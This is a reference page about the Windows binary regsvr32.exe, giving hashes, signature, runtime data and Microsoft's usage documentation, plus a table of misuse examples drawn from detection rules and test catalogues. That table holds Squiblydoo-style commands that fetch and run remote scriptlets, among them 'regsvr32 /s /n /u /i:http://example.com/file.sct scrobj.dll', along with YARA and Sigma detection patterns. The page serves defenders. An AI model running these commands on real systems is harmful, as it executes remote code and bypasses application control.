regsvr32.exe

  • File Path: C:\Windows\system32\regsvr32.exe
  • Description: Microsoft(C) Register Server

Screenshot

regsvr32.exe regsvr32.exe

Hashes

Type Hash
MD5 DA0E9A7777D16AE18BD9C642A9F42223
SHA1 FC99212A5F929D707AF49E8151CAB1E30FF658EB
SHA256 F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67
SHA384 6C3A7F8CA950E09AD85D774B4DB80781E9715A2A7011D784CFB86AC28A63A75AE8EE49F7BB12574412439FC0F94AD960
SHA512 1ED60C4D41EAE79A85F975891A018951503A53F083D2140B1F537A88AB5976D1DA239C8ACE57173B8CE3BA8CBD3DE07D5AEA5FA1B7C271E5F7B4444594D04D7D
SSDEEP 384:JPDotrdGJJHqNFYJypeqMKMPlhd5QkSg4rT9m/iGcQlUHB2rAOWrnLHWB:lDotrdGCNFR4XP9+khi9m/iGc4Uh2cL
IMP 0235FF9A007804882636BCCCFB4D1A2F
PESHA1 3F560BAEF52531C6A0A2935525802A9B82066D76
PE256 FA2F47546E63D978C53CB703509435FCBE34CD8560B35D9C17AA2FA13E1CADCA

Runtime Data

Window Title:

RegSvr32

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\imageres.dll.mui File
(R-D) C:\Windows\System32\en-US\regsvr32.exe.mui File
(RW-) C:\Users\user File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_de6e2bd0534e2567 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme2131664586 Section
\Windows\Theme966197582 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\AcLayers.dll
C:\Windows\System32\ADVAPI32.dll
C:\Windows\SYSTEM32\apphelp.dll
C:\Windows\System32\bcrypt.dll
C:\Windows\System32\bcryptPrimitives.dll
C:\Windows\System32\combase.dll
C:\Windows\System32\GDI32.dll
C:\Windows\System32\gdi32full.dll
C:\Windows\SYSTEM32\IPHLPAPI.DLL
C:\Windows\System32\kernel.appcore.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\System32\msvcrt.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\OLEAUT32.dll
C:\Windows\SYSTEM32\PROPSYS.dll
C:\Windows\system32\regsvr32.exe
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\sechost.dll
C:\Windows\SYSTEM32\sfc.dll
C:\Windows\SYSTEM32\sfc_os.DLL
C:\Windows\System32\shcore.dll
C:\Windows\System32\SHLWAPI.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\USER32.dll
C:\Windows\System32\win32u.dll
C:\Windows\SYSTEM32\WINSPOOL.DRV

Signature

  • Status: Signature verified.
  • Serial: 33000001C422B2F79B793DACB20000000001C4
  • Thumbprint: AE9C1AE54763822EEC42474983D8B635116C8452
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: REGSVR32.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.17763.1 (WinBuild.160101.0800)
  • Product Version: 10.0.17763.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/69
  • VirusTotal Link: https://www.virustotal.com/gui/file/f098fa150d9199732b4ec2e81528a951503a30f75afebf7e7a48360301758c67/detection/

File Similarity (ssdeep match)

File Score
C:\Windows\SysWOW64\regsvr32.exe 33

Possible Misuse

The following table contains possible examples of regsvr32.exe being misused. While regsvr32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\regsvr32.exe' DRL 1.0
sigma edr_command_execution_by_office_applications.yml description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\regsvr32.exe' DRL 1.0
sigma dns_query_win_regsvr32_network_activity.yml title: Regsvr32 Network Activity DRL 1.0
sigma dns_query_win_regsvr32_network_activity.yml description: Detects network connections and DNS queries initiated by Regsvr32.exe DRL 1.0
sigma dns_query_win_regsvr32_network_activity.yml - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ DRL 1.0
sigma dns_query_win_regsvr32_network_activity.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma file_event_win_creation_system_file.yml - '\regsvr32.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'regsvr32' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml # - '\regsvr32.exe' triggered by installing common software DRL 1.0
sigma net_connection_win_regsvr32_network_activity.yml title: Regsvr32 Network Activity DRL 1.0
sigma net_connection_win_regsvr32_network_activity.yml description: Detects network connections and DNS queries initiated by Regsvr32.exe DRL 1.0
sigma net_connection_win_regsvr32_network_activity.yml - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ DRL 1.0
sigma net_connection_win_regsvr32_network_activity.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_apt_bluemashroom.yml - '\regsvr32' DRL 1.0
sigma proc_creation_win_apt_evilnum_jul20.yml - 'regsvr32' DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32 DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml CommandLine\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'regsvr32' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'regsvr32' DRL 1.0
sigma proc_creation_win_malware_qbot.yml - 'regsvr32.exe' DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_monitoring_for_persistence_via_bits.yml CommandLine\|re: '(?i).*bitsadmin.*\/SetNotifyCmdLine.*(%COMSPEC%\|cmd.exe\|regsvr32.exe).*' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_office_applications_spawning_wmi_commandline.yml description: Initial execution of malicious document calls wmic to execute the file with regsvr32 DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml title: Excel Proxy Executing Regsvr32 With Payload DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'regsvr32' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml title: Excel Proxy Executing Regsvr32 With Payload DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*regsvr32*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_office_spawning_wmi_commandline.yml description: Initial execution of malicious document calls wmic to execute the file with regsvr32 DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_possible_applocker_bypass.yml # - '\regsvr32.exe' # too many FPs, very noisy DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'regsvr32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'regsvr32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml title: Regsvr32 Anomaly DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml description: Detects various anomalies in relation to regsvr32.exe DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml ParentImage\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml CommandLine\|contains: '..\..\..\Windows\System32\regsvr32.exe ' DRL 1.0
sigma proc_creation_win_susp_regsvr32_flags_anomaly.yml title: Regsvr32 Flags Anomaly DRL 1.0
sigma proc_creation_win_susp_regsvr32_flags_anomaly.yml description: Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time DRL 1.0
sigma proc_creation_win_susp_regsvr32_flags_anomaly.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_http_pattern.yml title: Suspicious Regsvr32 HTTP IP Pattern DRL 1.0
sigma proc_creation_win_susp_regsvr32_http_pattern.yml description: Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN DRL 1.0
sigma proc_creation_win_susp_regsvr32_image.yml title: Suspicious Regsvr32 Execution With Image Extension DRL 1.0
sigma proc_creation_win_susp_regsvr32_image.yml description: utilizes REGSVR32.exe to execute this DLL masquerading as a Image file DRL 1.0
sigma proc_creation_win_susp_regsvr32_image.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_no_dll.yml title: Regsvr32 Command Line Without DLL DRL 1.0
sigma proc_creation_win_susp_regsvr32_no_dll.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_system_exe_anomaly.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\regsvr32.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentversion.yml Image: 'C:\Windows\system32\regsvr32.exe' DRL 1.0
sigma registry_event_office_vsto_persistence.yml - '\regsvr32.exe' # e.g. default Evernote installation DRL 1.0
LOLBAS Cmd.yml - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat  
LOLBAS Regsvr32.yml Name: Regsvr32.exe  
LOLBAS Regsvr32.yml - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll  
LOLBAS Regsvr32.yml - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll  
LOLBAS Regsvr32.yml - Path: C:\Windows\System32\regsvr32.exe  
LOLBAS Regsvr32.yml - Path: C:\Windows\SysWOW64\regsvr32.exe  
LOLBAS Regsvr32.yml - IOC: regsvr32.exe retrieving files from Internet  
LOLBAS Regsvr32.yml - IOC: regsvr32.exe executing scriptlet (sct) files  
LOLBAS Regsvr32.yml - IOC: DotNet CLR libraries loaded into regsvr32.exe  
LOLBAS Regsvr32.yml - IOC: DotNet CLR Usage Log - regsvr32.exe.log  
LOLBAS Regsvr32.yml - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/  
malware-ioc nukesped_lazarus .REGSVR32.EXE``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc nukesped_lazarus .REGSVR32.exe``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "value": "Regsvr32 - T1117", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "tag_name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Regsvr32 - T1117\"", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)\n\nDetection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)\n\nPlatforms: Windows\n\nData Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry\n\nDefense Bypassed: Process whitelisting, Anti-virus\n\nPermissions Required: User, Administrator\n\nRemote Support: No\n\nContributors: Casey Smith", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Regsvr32 - T1117\"", © ESET 2014-2018
malware-ioc oceanlotus \|T1117\|Regsvr32 © ESET 2014-2018
atomic-red-team problem_report.md e.g. Run regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll MIT License. © 2018 Red Canary
atomic-red-team index.md - T1218.010 Regsvr32 MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Regsvr32 local COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Regsvr32 local DLL execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Regsvr32 Registering Non DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.010 Regsvr32 MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Regsvr32 local COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Regsvr32 local DLL execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Regsvr32 Registering Non DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | | | Regsvr32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | | | Regsvr32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. MIT License. © 2018 Red Canary
atomic-red-team T1218.008.md Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md # T1218.010 - Regsvr32 MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md <blockquote>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a “Squiblydoo” attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #1 - Regsvr32 local COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #2 - Regsvr32 remote COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #3 - Regsvr32 local DLL execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #4 - Regsvr32 Registering Non DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #1 - Regsvr32 local COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1218.010\src\RegSvr32.sct| MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ##### Description: Regsvr32.sct must exist on disk at specified location (#{filename}) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Invoke-WebRequest “https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct” -OutFile “#{filename}” MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #2 - Regsvr32 remote COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct| MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #3 - Regsvr32 local DLL execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md IF “%PROCESSOR_ARCHITECTURE%”==”AMD64” (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}#{regsvr32name} /s #{dll_name} ) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #4 - Regsvr32 Registering Non DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32| MIT License. © 2018 Red Canary
atomic-red-team T1220.md Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its Regsvr32/ “Squiblydoo” counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md regsvr32 /S “C:\Program Files\Oracle\VirtualBox\VboxC.dll” MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md regsvr32 /u /S “C:\Program Files\Oracle\VirtualBox\VboxC.dll” MIT License. © 2018 Red Canary
signature-base apt_apt30_backspace.yar $s0 = “regsvr32 /s "%ProgramFiles%\Norton360\Engine\5.1.0.29\ashelper.dll"” fullword CC BY-NC 4.0
signature-base apt_codoso.yar $s1 = “regsvr32.exe /s "%s"” fullword ascii CC BY-NC 4.0
signature-base apt_leviathan.yar $x2 = “regsvr32 /s "%s" DR CIM” fullword wide CC BY-NC 4.0
signature-base apt_ta17_318A.yar $s1 = “REGSVR32.EXE.MUI” fullword wide CC BY-NC 4.0
signature-base crime_cobaltgang.yar $x2 = “WriteLine(" (new ActiveXObject(‘WScript.Shell’)).Run(‘regsvr32 /s” ascii CC BY-NC 4.0
signature-base crime_cobaltgang.yar $x4 = “sh.Run(‘regsvr32 /s /u /i:” ascii CC BY-NC 4.0
signature-base crime_cobaltgang.yar $x5 = “.Get(‘Win32_ScheduledJob’).Create(‘regsvr32 /s /u /i:” ascii CC BY-NC 4.0
signature-base gen_cn_hacktool_scripts.yar $s0 = “regsvr32.exe /u C:\windows\system32\PacketX.dll” fullword ascii CC BY-NC 4.0
signature-base gen_cn_hacktool_scripts.yar $s1 = “regsvr32.exe C:\windows\system32\PacketX.dll” fullword ascii CC BY-NC 4.0
signature-base gen_mal_scripts.yar $x2 = “.Run(‘regsvr32 /s /u /i:” ascii CC BY-NC 4.0
signature-base gen_mal_scripts.yar $x3 = “new ActiveXObject(‘WScript.Shell’)).Run(‘regsvr32 /s” fullword ascii CC BY-NC 4.0
signature-base gen_recon_indicators.yar $s11 = “regsvr32 /s /u “ ascii CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0
signature-base thor-hacktools.yar $s1 = “exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, “ ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s3 = “oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False” fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s4 = “EchoB("regsvr32.exe exitcode = " & exitcode)” fullword ascii CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar Identifier: regsvr32 issue CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar description = “Detects a scriptlet file in the temporary Internet files (see regsvr32 AppLocker bypass)” CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


regsvr32

Registers .dll files as command components in the registry.

Syntax

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] <Dllname>

Parameters

Parameter Description
/u Unregisters server.
/s Prevents displaying messages.
/n Prevents calling DllRegisterServer. This parameter requires you to also use the /i parameter.
/i:<cmdline> Passes an optional command-line string (cmdline) to DllInstall. If you use this parameter with the /u parameter, it calls DllUninstall.
<Dllname> The name of the .dll file that will be registered.
/? Displays help at the command prompt.

Examples

To register the .dll for the Active Directory Schema, type:

regsvr32 schmmgmt.dll

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.